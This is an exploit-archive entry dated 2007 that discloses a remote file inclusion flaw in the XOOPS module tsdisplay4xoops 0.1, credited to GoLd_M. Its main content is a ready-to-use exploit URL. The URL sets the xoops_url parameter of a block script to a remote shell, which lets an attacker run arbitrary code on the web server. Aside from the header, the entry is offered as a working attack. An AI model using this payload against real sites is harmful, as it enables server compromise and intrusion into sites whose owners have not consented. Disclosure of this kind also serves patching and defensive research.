id: 1767
date: 04/15/2007
title: XOOPS Module tsdisplay4xoops 0.1 Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

====================================================================
XOOPS Module tsdisplay4xoops 0.1 Remote File Inclusion Vulnerability
====================================================================


# tsdisplay4xoops 0.1(xoops_url)Remote File Include Vulnerabilitiy
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell



#  0day.today [2023-03-27]  #